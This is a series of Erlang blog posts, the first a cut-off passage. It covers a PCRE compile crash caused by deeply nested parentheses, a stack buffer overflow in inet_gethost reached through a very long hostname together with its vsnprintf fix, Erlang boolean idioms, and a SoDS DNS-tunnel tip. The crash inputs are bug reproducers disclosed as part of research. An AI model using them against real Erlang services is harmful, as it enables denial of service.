<pre class="Code"><span class="Comment">% works!</span>
N <span class="Statement">=</span> <span class="Constant">611</span>,
<span class="Identifier">re:compile</span>([<span class="Identifier">lists:duplicate</span>(N, $(), <span class="Identifier">lists:duplicate</span>(N, $))])<span class="Special">.</span>
<span class="Comment">% booo! crashes!!</span>
N <span class="Statement">=</span> <span class="Constant">612</span>,
<span class="Identifier">re:compile</span>([<span class="Identifier">lists:duplicate</span>(N, $(), <span class="Identifier">lists:duplicate</span>(N, $))])<span class="Special">.</span>
</pre><pre class="Code">Program received signal EXC_BAD_ACCESS, Could not access memory.
<span class="Statement">Reason</span>: KERN_PROTECTION_FAILURE at address: <span class="Constant">0xb014effc</span>
[Switching to process <span class="Constant">3601</span>]
<span class="Constant">0x001c04e4</span> in compile_branch (optionsptr=<span class="Constant">0x0</span>, codeptr=<span class="Constant">0x0</span>, ptrptr=<span class="Constant">0x0</span>, errorcodeptr=<span class="Constant">0x0</span>, firstbyteptr=<span class="Constant">0x0</span>, reqbyteptr=<span class="Constant">0x0</span>, bcptr=<span class="Constant">0x0</span>, cd=<span class="Constant">0x0</span>\
, lengthptr=<span class="Constant">0x0</span>) at pcre_compile.c:<span class="Constant">2355</span>
</pre>Except, beam didn't crash when running inside gdb. I figured out the debug beam was non-smp and, after compiling a debug smp version, I got the longest backtrace EVAH.<br />
<script src="http://gist.github.com/327028.js?file=smp.erl"></script><br />
Yet the same code works with an SMP Erlang on Solaris.<br />
Blah, debugging threaded code is a pain. If someday, someone figures out how to do something malicious with this, please send me a postcard from whatever island retreat you've purchased with all your stolen credit cards or DoS extortions.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-46828985071401584712010-02-15T13:48:00.000-05:002010-05-31T17:04:50.271-04:00Erlang and Excessively Long HostnamesI've been reading through the Erlang source code, trying to get familiar with it and looking for small bugs. <br />
inet_gethost is a port that handles name lookups. The <a href="http://github.com/erlang/otp/blob/ccase/r13b04_dev/erts/etc/common/inet_gethost.c">source code</a> for it is in:<br />
<pre class="Code">$ERL_TOP<span class="Statement">/</span>erts<span class="Statement">/</span>etc<span class="Statement">/</span>common<span class="Statement">/</span>inet_gethost<span class="Special">.</span>c
</pre>inet_gethost is suprisingly complicated, mainly because of portability concerns and probably due to age as well (the code looks to be about 10+ years old). inet_gethost works by starting up a master process that forks a pool of slave processes and waits for data coming from stdin. When it reads a packet from the Erlang side, it sends the data to the slave over a pipe. The slave does a gethostbyname() (or the IPv6 equivalents), blocking in the lookup, then writes the response.<br />
Setting the environment variable "ERL_INET_GETHOST_DEBUG" will print out some extra debug messages. The values in the code range from 0 (debug disabled) to 5:<br />
<pre class="Code">export ERL_INET_GETHOST_DEBUG<span class="Statement">=</span><span class="Constant">5</span>
erl
</pre>To test how inet_gethost handles some simple edge cases, we run the following:<br />
<pre class="Code"><span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">inet:gethostbyname</span>(<span class="Identifier">lists:duplicate</span>(<span class="Constant">3</span>,<span class="Constant">"n"</span>))<span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>Saved domainname <span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>Created worker[<span class="Constant">4925</span>] with fd <span class="Constant">3</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>Saved domainname <span class="Special">.</span>
inet_gethost[<span class="Constant">4925</span>] (DEBUG)<span class="Special">:</span>Worker got request, op <span class="Statement">=</span> <span class="Constant">1</span>, proto <span class="Statement">=</span> <span class="Constant">1</span>, data <span class="Statement">=</span> nnn<span class="Special">.</span>
inet_gethost[<span class="Constant">4925</span>] (DEBUG)<span class="Special">:</span>Starting gethostbyname(nnn)
inet_gethost[<span class="Constant">4925</span>] (DEBUG)<span class="Special">:</span>gethostbyname error <span class="Constant">1</span>
{error,nxdomain}
</pre>Increasing the number of characters in the domain name reveals something interesting:<br />
<pre class="Code"><span class="Constant">4</span><span class="Statement">></span> <span class="Identifier">inet:gethostbyname</span>(<span class="Identifier">lists:duplicate</span>(<span class="Constant">100000</span>,<span class="Constant">"n"</span>))<span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>Saved domainname <span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>Saved domainname <span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span><span class="Identifier">reap_children: res</span> <span class="Statement">=</span> <span class="Statement">-</span><span class="Constant">1</span>, errno <span class="Statement">=</span> <span class="Constant">10</span><span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>End <span class="Statement">of</span> file while reading from pipe<span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>]<span class="Special">:</span> <span class="Identifier">WARNING:Malformed</span> reply (header) from worker <span class="Identifier">process</span> <span class="Constant">4925</span><span class="Special">.</span>
inet_gethost[<span class="Constant">4924</span>] (DEBUG)<span class="Special">:</span>Killing worker[<span class="Constant">4925</span>] with fd <span class="Constant">3</span>, serial <span class="Constant">4</span>
{error,timeout}
</pre>On Mac OS X, the CPU usage for inet_gethost shoots up as well.<br />
The weird error ("Malformed reply ...") happens because the slave process crashes. If you look at the two outputs, the error message that should be displayed after "Saved domainname." ("Worker got request ...") is never printed. That's because of an overflow that happens when the debug output is printed (buff is only 2048 bytes):<br />
<pre class="Code"><span class="Type">static</span> <span class="Type">void</span> debugf(<span class="Type">char</span> *format, ...)
{
<span class="Type">char</span> buff[<span class="Constant">2048</span>];
<span class="Type">char</span> *ptr;
<span class="Type">va_list</span> ap;
va_start(ap,format);
sprintf(buff,<span class="Constant">"</span><span class="Special">%s</span><span class="Constant">[</span><span class="Special">%d</span><span class="Constant">] (DEBUG):"</span>,program_name,(<span class="Type">int</span>) getpid());
ptr = buff + strlen(buff);
vsprintf(ptr,format,ap);
strcat(ptr,<span class="Constant">"</span><span class="Special">\r\n</span><span class="Constant">"</span>);
write(<span class="Constant">2</span>,buff,strlen(buff));
va_end(ap);
}
</pre>Replacing vsprintf() with vsnprintf() fixes that bug, but inet_gethost will still crash on Mac OS X Snow Leopard.<br />
Writing a small program to call gethostbyname() on Mac OS X proves it is not an Erlang bug:<br />
<script src="http://gist.github.com/304825.js?file=gho.c"></script><br />
Looks like a bug in gethostbyname() on Mac OS X Snow Leopard, while doing a multicast DNS lookup:<br />
<pre code="Class">Feb 15 12:42:48 ack mDNSResponder[18]: 77: ERROR: read_msg - hdr.datalen 70001 (11171) > 70000
Feb 15 12:42:48 ack ./gho[4852]: dnssd_clientstub write_all(4) failed -1/70028 32 Broken pipe
Feb 15 12:42:48 ack ./gho[4852]: dnssd_clientstub deliver_request ERROR: write_all(4, 70028 bytes) failed
Feb 15 12:42:48 ack ./gho[4852]: dnssd_clientstub write_all(4) failed -1/28 32 Broken pipe
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-54948832872493785472010-02-07T16:31:00.000-05:002010-02-07T16:33:56.781-05:00Erlang Ternary Operators<a href="http://tidier.softlab.ntua.gr/">tidier</a> came up with a cool suggestion for some code. One of the case statements:<br />
<pre class="Code">Valid <span class="Statement">=</span> <span class="Statement">case</span> makesum(Hdr) <span class="Statement">of</span>
<span class="Constant">0</span> <span class="Statement">-></span> <span class="Statement">true</span>;
_ <span class="Statement">-></span> <span class="Statement">false</span>
<span class="Statement">end</span>,
</pre>was replaced with:<br />
<pre class="Code">Valid <span class="Statement">=</span> makesum(Hdr) <span class="Statement">=</span><span class="Special">:</span><span class="Statement">=</span> <span class="Constant">0</span>,
</pre>Maybe it's succintness at the expense of readability but I liked it.<br />
Sometimes, when I'm programming in Erlang, I miss the C style <a href="http://en.wikipedia.org/wiki/Ternary_operator">ternary operators</a>. You know, the ones that look like this:<br />
<pre class="Code">i = ( (i == <span class="Constant">0</span>) ? <span class="Constant">1</span> : <span class="Constant">0</span>);
</pre>It's an easy way of toggling between values. In Erlang, if you want to flip between true and false, you could write it as:<br />
<pre class="Code">NewValue <span class="Statement">=</span> <span class="Statement">case</span> Value <span class="Statement">of</span>
<span class="Statement">true</span> <span class="Statement">-></span> <span class="Statement">false</span>;
<span class="Statement">false</span> <span class="Statement">-></span> <span class="Statement">true</span>
<span class="Statement">end</span>
</pre>But the tidier way reveals a simpler version:<br />
<pre class="Code">NewValue <span class="Statement">=</span> Value <span class="Statement">=/=</span> <span class="Statement">true</span>
</pre>The new version isn't semantically identical to the old version though.<br />
<pre class="Code"><span class="Statement">true</span> <span class="Statement">=</span> foo <span class="Statement">=/=</span> <span class="Statement">true</span>
</pre>The old version would throw a case_clause exception if value were 'foo'. In both cases, the value of "Value" may already be controlled with guards, so it may be ok.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-29542100354281188862010-01-26T09:24:00.000-05:002010-02-01T18:04:55.816-05:00SoDS and TXT RecordsSometimes the sods client (sdt) will return an error "Invalid base64 encoded packet". If run with the default options, sdt will use TXT records and it's likely that someone, in between you and the sods server, is re-writing the TXT records.<br />
<br />
In this particular case, it might be the DNS hosting service that I used for the test domain (GoDaddy) inserting an <a href="http://en.wikipedia.org/wiki/Sender_Policy_Framework">SPF</a> record. Thanks a bunch for that.<br />
<br />
But I've seen hotel networks where TXT records are MITM'ed, for some sort of nefarious Active Directory scheme.<br />
<br />
Anyway, the fix is to run sdt with the "-t" flag set to use NULL or CNAME records ("-t null" or "-t cname").Unknownnoreply@blogger.com0